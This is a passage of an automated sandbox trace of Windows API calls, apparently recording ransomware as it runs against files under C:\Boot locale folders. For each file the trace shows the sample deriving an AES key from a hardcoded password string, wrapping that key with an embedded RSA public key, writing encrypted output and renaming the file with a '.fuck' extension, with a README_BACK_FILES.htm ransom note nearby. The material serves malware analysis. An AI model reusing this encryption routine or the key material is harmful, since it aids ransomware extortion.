(lpExistingFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.fuck")) returned 0 [0231.792] CryptDestroyHash (hHash=0x2716aa8) returned 1 [0231.792] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.792] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.792] FindNextFileA (in: hFindFile=0x2716ce8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.792] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.792] GetLastError () returned 0x5 [0231.793] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui")) returned 0x20 [0231.793] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.793] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.793] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.793] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.793] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.795] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.795] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.795] CryptHashData (hHash=0x2716aa8, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.795] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716aa8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716c68) returned 1 [0231.795] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.795] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.796] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782650) returned 1 [0231.796] CryptImportPublicKeyInfo (in: hCryptProv=0x2782650, dwCertEncodingType=0x1, pInfo=0x277da00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277da30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277da38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27171e8) returned 1 [0231.796] CryptEncrypt (in: hKey=0x27171e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.796] CryptEncrypt (in: hKey=0x27171e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276acd8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276acd8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.796] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276acd8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.797] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2793758, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2793758, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.797] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2793758*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2793758*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.797] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2793758, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.797] CloseHandle (hObject=0xffffffff) returned 1 [0231.797] CloseHandle (hObject=0xffffffff) returned 1 [0231.797] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.797] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.797] DeleteFileA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.gsg")) returned 0 [0231.797] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.fuck")) returned 0 [0231.798] CryptDestroyHash (hHash=0x2716aa8) returned 1 [0231.798] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.798] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.798] FindNextFileA (in: hFindFile=0x2716ce8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.798] FindNextFileA (in: hFindFile=0x2716ce8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.798] FindClose (in: hFindFile=0x2716ce8 | out: hFindFile=0x2716ce8) returned 1 [0231.798] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-cn\\readme_back_files.htm")) returned 0x20 [0231.799] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.799] FindFirstFileA (in: lpFileName="C:\\\\Boot\\zh-HK\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.800] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.800] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.800] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.800] GetLastError () returned 0x12 [0231.800] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0231.800] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.800] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.801] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.801] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.801] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.803] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.803] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.803] CryptHashData (hHash=0x2716b68, pbData=0x2ec968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.803] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.803] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.803] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.803] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2793210) returned 1 [0231.803] CryptImportPublicKeyInfo (in: hCryptProv=0x2793210, dwCertEncodingType=0x1, pInfo=0x277d520*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d550*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d558*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27171a8) returned 1 [0231.803] CryptEncrypt (in: hKey=0x27171a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.803] CryptEncrypt (in: hKey=0x27171a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792990*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2792990*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.804] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792990, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.804] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2793758, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2793758, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.804] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2793758*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2793758*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.804] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2793758, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.804] CloseHandle (hObject=0xffffffff) returned 1 [0231.804] CloseHandle (hObject=0xffffffff) returned 1 [0231.804] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.804] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.804] DeleteFileA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.gsg")) returned 0 [0231.804] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.fuck")) returned 0 [0231.805] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.805] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.805] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.805] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.805] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.805] GetLastError () returned 0x5 [0231.805] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui")) returned 0x20 [0231.808] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.808] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.808] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.808] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.808] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2792ee0) returned 1 [0231.810] CryptCreateHash (in: hProv=0x2792ee0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.810] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.810] CryptHashData (hHash=0x2716ce8, pbData=0x2ec760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.810] CryptDeriveKey (in: hProv=0x2792ee0, Algid=0x6610, hBaseData=0x2716ce8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716b68) returned 1 [0231.810] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.810] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.810] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2793540) returned 1 [0231.811] CryptImportPublicKeyInfo (in: hCryptProv=0x2793540, dwCertEncodingType=0x1, pInfo=0x277d5f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d620*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d628*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717168) returned 1 [0231.811] CryptEncrypt (in: hKey=0x2717168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.811] CryptEncrypt (in: hKey=0x2717168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2793298*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2793298*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.811] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2793298, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.811] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2795760, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2795760, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.811] CryptEncrypt (in: hKey=0x2716b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2795760*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2795760*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.811] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2795760, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.811] CloseHandle (hObject=0xffffffff) returned 1 [0231.811] CloseHandle (hObject=0xffffffff) returned 1 [0231.811] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.812] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.812] DeleteFileA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.gsg")) returned 0 [0231.812] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.fuck")) returned 0 [0231.812] CryptDestroyHash (hHash=0x2716ce8) returned 1 [0231.812] CryptDestroyKey (hKey=0x2716b68) returned 1 [0231.812] CryptReleaseContext (hProv=0x2792ee0, dwFlags=0x0) returned 1 [0231.812] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.812] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.812] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.813] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-hk\\readme_back_files.htm")) returned 0x20 [0231.813] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.813] FindFirstFileA (in: lpFileName="C:\\\\Boot\\zh-TW\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.814] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.815] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.815] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.815] GetLastError () returned 0x12 [0231.815] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0231.815] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.815] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.815] CreateFileA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.815] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.816] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x27935c8) returned 1 [0231.817] CryptCreateHash (in: hProv=0x27935c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.817] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.817] CryptHashData (hHash=0x2716b68, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.817] CryptDeriveKey (in: hProv=0x27935c8, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.818] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.818] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.818] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2793650) returned 1 [0231.820] CryptImportPublicKeyInfo (in: hCryptProv=0x2793650, dwCertEncodingType=0x1, pInfo=0x277d790*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d7c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d7c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27172e8) returned 1 [0231.820] CryptEncrypt (in: hKey=0x27172e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.820] CryptEncrypt (in: hKey=0x27172e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2793320*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2793320*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.820] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2793320, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.820] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2795760, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2795760, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.820] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2795760*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2795760*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.820] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2795760, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.820] CloseHandle (hObject=0xffffffff) returned 1 [0231.820] CloseHandle (hObject=0xffffffff) returned 1 [0231.820] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.gsg"), 